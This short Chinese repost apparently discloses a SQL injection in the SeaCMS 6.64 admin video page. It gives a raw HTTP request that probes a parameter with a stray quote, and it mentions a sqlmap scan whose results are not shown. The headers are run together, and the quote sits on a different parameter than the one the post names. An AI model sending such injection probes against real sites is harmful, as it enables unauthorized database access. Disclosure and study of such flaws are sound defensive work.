本文共 580 字,大约阅读时间需要 1 分钟。
请求数据包:
order参数存在sql注入GET /seacms6.64/upload/admin/admin_video.php?repeat=ok&order=v_name&allrepeat=ok' HTTP/1.1
Host: 172.16.173.249User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/61.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Referer: ... e.php?action=repeatCookie: PHPSESSID=odsoljsk6cvfkvcgm0i03v8np6Connection: closeUpgrade-Insecure-Requests: 1sqlmap扫描结果:
数据库名:
转载于:https://blog.51cto.com/13770310/2177214